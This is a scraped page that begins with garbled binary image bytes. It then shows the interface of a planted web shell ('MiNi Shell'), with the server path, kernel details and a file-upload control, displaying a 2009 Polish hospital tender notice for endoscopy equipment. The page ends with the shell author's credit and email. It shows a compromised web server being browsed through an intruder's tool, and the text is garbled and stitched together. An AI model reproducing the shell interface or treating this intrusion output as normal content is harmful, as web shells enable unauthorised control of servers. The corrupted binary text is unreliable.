JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/148438-N-2009.html

<p class="kh_header"><b>Nowe Miasto: Urządzenia medyczne (Endoskopia)- zadanie nr....   . Nr. sprawy ZP, PN( 4  )2009 .Nie otwierać przed dniem   29.05 .2009 r godz. 10 00</b><br>
<b>Numer ogłoszenia: 148438 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Tomaszowska 43, 26-420 Nowe Miasto, woj. mazowieckie, tel. 048 6743842, faks 048 6740040.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zo-nowemiasto.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Urządzenia medyczne (Endoskopia)- zadanie nr....   . Nr. sprawy ZP, PN( 4  )2009 .Nie otwierać przed dniem   29.05 .2009 r godz. 10 00.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego postępowania jest zamówienie na zakup wraz z dostawą 
   Myjni ultradźwiękowej  oraz w 24 miesięcznych ratach Zestawu endoskopowego 
   w składzie : Wideogastroskop , Wideokolonoskop,  Procesor wizyjny,Źródło 
   światła  oraz  Myjnia automatyczna do   mycia endoskopów * .Zakup ratalny 
   dotyczy tylko i wyłącznie Zestawu endoskopowego.
1.1.Przedmiot zamówienia podzielony został na 2 części. Każda ze wskazanych
     części zamówienia określana będzie  mianem (zadania). 
    1)zadanie nr 1 - Zestaw endoskopowy w składzie: Wideogastroskop , 
       Wideokolonoskop, Proceso wizyjny, Źródło światła  oraz Myjnia automatyczna 
       do mycia endoskopów oznaczenie wg Wspólnego Słownika Zamówień : Kod 
       CPV 33168100-6, 33168100-6 - załącznik  nr 3 SIWZ - zakup w 24 ratach,
    2)zadanie nr 2 - Myjnia ultradźwiękowa do mycia narzędzi laparoskopowych 
       oznaczenie wg Wspólnego Słownika Zamówień :  Kod CPV  33191000-5 - 
       załącznik nr 4 SIWZ,    
1.2.Szczegółowy opis  przedmiotu zamówienia wymienionego w poz.3.1.1.  i jego 
     parametry graniczne określone  zostały w formularzach Parametry graniczne - 
     załączniki nr 3 i 4 SIWZ.
1.3.Zamawiający dopuszcza  składanie ofert częściowych na poszczególne 
     zadania. Jednocześnie zastrzega, że jeden wykonawca może złożyć tylko jedną 
     ofertę częściową obejmującą dowolną liczbę zadań.
1.4.W ramach pojedynczego zadania przedmiot zamówienia jest niepodzielny .
1.5.Zamawiający nie dopuszcza składanie ofert wariantowych i drogą 
      elektroniczną ,o których mowa w art.36 ust.2 pkt 4 i pkt 5 ustawy.
1.6.Zamawiający nie przewiduje zastosowania aukcji elektronicznej ,o której mowa 
     w art.36 ust.2 pkt 7 ustawy.
1.7.Zamawiający  nie przewiduje zamówień uzupełniających ,o których mowa w art 
     67 ust 1 pkt 7 ustawy oraz podpisania umowy ramowej. 
1.8.W trakcie postępowania wykonawcy powinni traktować poszczególne zadania 
      jako oddzielne części-  np. Składając zapytanie ,protest należy wskazać jakiej 
      części  dotyczy. Zamawiający prowadząc postępowanie będzie dokonywał
      czynności  związanych w postępowaniu wskazując jakiej części dotyczy.
1.9.Wykonawca  dostarczy przedmiot zamówienia do zamawiającego własnym 
     transportem na własny  koszt i odpowiedzialność  po podpisaniu umowy . W 
     zakres dostawy wchodzi bezpłatna instalacja i uruchomienie przedmiotu
     zamówienia w miejscu wskazanym przez zamawiającego ,ubezpieczenie na czas 
     transportu oraz przeprowadzeniem  szkolenia personelu z zakresu obsługi i 
     eksploatacji urządzenia.
    a)Wraz ze złożoną ofertą  wykonawca dostarczy materiały reklamowe (rok 
       produkcji,zdjęcie urządzenia ,dane  techniczne ,opis zasady działania, 
       oprogramowanie  itp.) .Wraz z dostarczeniem przedmiotu zamówienia
       wykonawca dostarczy  Instrukcję obsługi i eksploatacji urządzenia w języku 
       polskim .
    b) Nie spełnienie któregokolwiek z parametrów wymienionych w załącznikach 3 i 
       4 SIWZ spowoduje odrzucenie oferty. 
    c) Wykonawca zagwarantuje bezpłatne okresowe przeglądy aparatu zgodnie z 
        instrukcją obsługi w okresie  trwania gwarancji . W przypadku napraw w 
        okresie gwarancyjnym dłuższych niż 7 dni zostanie dostarczone przez
        wykonawcę urządzenie zastępcze.                                                        
    1)Odbiór  przedmiotu zamówienia  odbędzie się będzie w dni robocze w 
       godzinach  od 700- 1430  w obecności upoważnionego przedstawiciela 
       zamawiającego.
    2)Miejscem odbioru  zamówienia jest magazyn  Samodzielnego Publicznego 
       Zakładu Opieki Zdrowotnej   26-420 Nowym-Mieście n/P  ul. Tomaszowska 43 
       lub pracownia Endoskopii szpitala.
1.10.Wykonawca będzie odpowiedzialny względem zamawiającego za to , iż jest 
       uprawniony do wprowadzenia do obrotu i używania przedmiotu zamówienia.
1.11.Oferowany przez wykonawcę przedmiot zamówienia musi być dopuszczony do
       obrotu i  używania w jednostkach służby zdrowia, spełniać wymagania 
       zasadnicze zgodne z wymaganiami prawa wspólnotowego i polskiego, spełniać
       wymagania jakościowe oraz posiadać odpowiednie  atesty, certyfikaty 
       deklaracje zgodności i świadectwa rejestracji.   Wielkość zamówienia wynosi 
       293.500 , 0 zł..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.81.00-6, 33.19.10.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wykonawcy będący osobami
  fizycznymi, osobami prawnymi lub  jednostkami organizacyjnymi nie posiadającymi 
  osobowości prawnej, a także wykonawcy ci występujący wspólnie spełniający 
  warunki określone w art 22 ust 1 pkt1- 4, ustawy z dnia 29 stycznia 2004 r oraz
  Specyfikacji Istotnych   Warunków Zamówienia szczególności : 
   1) posiadają uprawnienia do wykonywania działalności  lub czynności objętych 
       przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich
       uprawnień ;
  2) posiadają niezbędną wiedzę i doświadczenie oraz :
      a)dysponują potencjałem technicznym i  osobami zdolnymi do wykonania 
         zamówienia*, 
      b)dysponuję(my)potencjałem technicznym oraz przedkładamy w załączeniu  
         pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych do 
         wykonania zamówienia*,
      c)dysponuję (my) osobami zdolnymi do wykonania zamówienia  oraz 
         przedkładamy w załączeniu pisemne zobowiązanie innych podmiotów do 
         udostępniania potencjału technicznego*,
      d)przedkładamy w załączeniu pisemne zobowiązanie innych podmiotów do 
         udostępnienia potencjału technicznego i osób zdolnych do wykonania 
         zamówienia* oraz udokumentują to poprzez wykazanie realizacji jednej 
         dostawy odpowiadającej swoim rodzajem oraz wartością dostawom  
         stanowiącym przedmiot zamówienia,
    3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
        zamówienia oraz udokumentują to poprzez złożenie polisy ubezpieczeniowej,
    4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na 
        podstawie art. 24  ustawy Prawo zamówień publicznych . 
  Sprawdzenie wymaganych warunków udziału w postępowaniu odbywać się będzie 
  na podstawie przedłożonych przez Wykonawcę wraz z ofertą dokumentów i 
  oświadczeń  potwierdzających spełnienie warunków w postępowaniu i 
  wymaganych przez Zamawiającego w pkt.6 niniejszej SIWZ zgodnie 
  formułą (spełnia  -  nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wraz ze złożoną ofertą wypełnioną na Formularzu ofertowym wg. wzoru 
   określonego w załączniku nr 2  SIWZ należy załączyć:
    a)Wypełniony i podpisany formularz cenowy wg. wzoru określonego w 
       załącznikach  nr 3A lub 4A SIWZ   
    b)Oświadczenie że Wykonawcy  spełnienia wymagania wynikające z  art. 22 ust 
       1 ustawy i nie podlega wykluczeniu na podstawie art. 24 ust 1 i  2 ustawy 
       wg. wzoru określonego w załączniku  nr 1  SIWZ  ( w przypadku konsorcjum 
       oświadczenie zawarte w art.22 ust 1 pkt 1-3 składane jest wspólnie ,a pkt 4 
       musi złożyć każdy  wykonawca  z osobna).
2.W celu potwierdzenia posiadania uprawnień  do wykonywania  działalności 
      określonej przedmiotem zmówienia  lub czynności wykonawcy winni złożyć 
      następujące dokumenty :
    a)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
       ewidencji o  działalności gospodarczej ,jeżeli odrębne  przepisy wymagają 
       wpisu do rejestru lub zgłoszenia do ewidencji o działalności  gospodarczej   
       wystawione nie wcześniej niż 6 m-cy  przed upływem terminu składania ofert , 
       w przypadku dostarczenia dokumentu uprawniającego wykonawcę do obrotu
       prawnego wystawionego w innym kraju ,konieczne jest jego potwierdzenie 
       przez właściwą Ambasadę ( w przypadku konsorcjum ubiegającego się o 
       zamówienia ,każdy z wykonawców jest   zobowiązany złożyć ten dokument).
    b)dla przedmiotu oferty kwalifikowanego jako wyrób medyczny - oryginał lub 
       kserokopię Rejestru produktu zamówienia i podmiotu odpowiedzialnego  za 
       jego  wprowadzenie do obrotu wydanego przez Prezesa Urzędu Rejestracji 
       Produktów Leczniczych,  Wyrobów Medycznych i Produktów Biobójczych  lub
       złożenia kserokopii zgłoszenia przedmiotu zamówienia do Rejestru Wyrobów
       Medycznych , 
    c)aktualne dokumenty dopuszczające do obrotu na rynek polski : deklarację  
       zgodności   z dyrektywą 93)42 EEC lub inne równoważne dokumenty,  
    d)certyfikat CE wydany przez jednostkę notyfikowaną ,   
    e)oryginalne katalogi przedstawiające oferowany przedmiot zamówienia z 
       parametrami technicznymi urządzenia, potwierdzające spełnienie  parametrów 
       wymaganych przez zamawiającego w języku polskim,
    f)Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w 
      imieniu Wykonawcy składającego ofertę , o ile nie wynikają z przepisów prawa
      lub innych dokumentów. Pełnomocnictwo  powinno być złożone w formie 
      oryginału lub kopii sporządzonej notarialnie. 
 3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
     Rzeczypospolitej Polskiej,  stosuje się do przepisów   zawartych w 
     Rozporządzeniu Prezesa Rady Ministrów z dnia 19 maja  2008 r w sprawie 
    rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz  form
       w jakich dokumenty powinny być składane ( Dz. U. Nr 188 poz.1155)- składa: 
      - aktualny dokument wystawiony w kraju, w którym ma siedzibę lub miejsce 
        zamieszkania,potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono 
        upadłości: jeśli w kraju pochodzenia osoby lub w kraju,w którym wykonawca 
        ma siedzibę lub miejsce zamieszkania nie wydaje się takiego dokumentu;
     - dokument zawierający oświadczenie złożone przed notariuszem,właściwym 
       organem sądowym, administracyjnym albo organem samorządu zawodowego 
       osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania;   
 4.W celu potwierdzenia ,że wykonawca posiada niezbędną wiedzę i 
     doświadczenie,oraz dysponuje  potencjałem technicznym i dysponuje osobami 
     zdolnymi do wykonania zamówienia , zamawiający  wymaga : 
    a)wykazu wykonanych  w okresie nie dłuższym niż ostatnie trzy lata dostaw  
       odpowiadających  swoim rodzajem oraz wartością dostawom stanowiącym 
       przedmiot zamówienia , z podaniem ich wartości ,przedmiotu ,dat wykonania i 
       odbiorców - załącznik  nr 6  SIWZ . Na potwierdzenie ,wykonawcy winni  
       wykazać , że w ciągu ostatnich trzech lat wykonali co najmniej jedną 
       dostawę w zakresie przedmiotu zamówienia odpowiadające wartością i 
       zakresem niniejszemu zamówieniu. Do wykazu należy załączyć dokumenty 
       potwierdzające ,że dostawy  zostały należycie wykonane ( co najmniej jeden z
        członków konsorcjum) .
 5.W celu potwierdzenia ,że wykonawca  znajduje się w sytuacji ekonomicznej i 
     finansowej  zapewniającej wykonanie zamówienia,   zamawiający wymaga 
     złożenia :
    a)ważnej kserokopii polisy ubezpieczeniowej ,  a w przypadku jej braku innego
       dokumentu ubezpieczenia potwierdzającego, że wykonawca jest 
       ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  
       działalności gospodarczej na  sumę nie mniejszą niż przedmiot zamówienia
       ( w przypadku konsorcjum każdy członek konsorcjum składa oddzielnie).
 6.Dokumenty, są składane w formie  oryginału, wypisu , odpisu lub kopii w języku  
   polskim lub   przetłumaczone przez tłumaczy przysięgłych  na język polski, 
   stosownie do obowiązujących przepisów.
 7.Kserokopie dokumentów powinny być czytelne i potwierdzone za zgodność z
    oryginałem przez  wykonawcę lub osoby (ę) uprawnione (ą) do składania 
    oświadczeń woli w imieniu wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zoz-nowemiasto.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Nowe-Miasto n/P ul. Tomaszowska 43  kod 26-420. Opłata 30 zł po wpłaceniu na konto w Banku Spółdzielczym Belsk Duży  75 9116 0001 0001 4616 2000 0001.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2009 godzina 09:30, miejsce: SP ZOZ  ul. Tomaszowska 43 26 -420 Nowe-Miasto n/P -budynek administracji (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zestaw endoskopowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw endoskopowy składa się z Wideokolonoskopu , Wideogastroskopu, Procesora wizyjnego, Źródła światła oraz Myjni automatycznej do mycia endoskopów  i Myjnia ultradźwiękowa. Zakup w 24 miesięcznych ratach. Szacunkowa wartość 290.000,0 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.81.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Parametry techniczne - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Myjnia ultradźwiękowa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Myjnia ultradźwiękowa do mycia narzędzi laporoskopowych. Szacunkowa wartość  3.500,0 zł..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com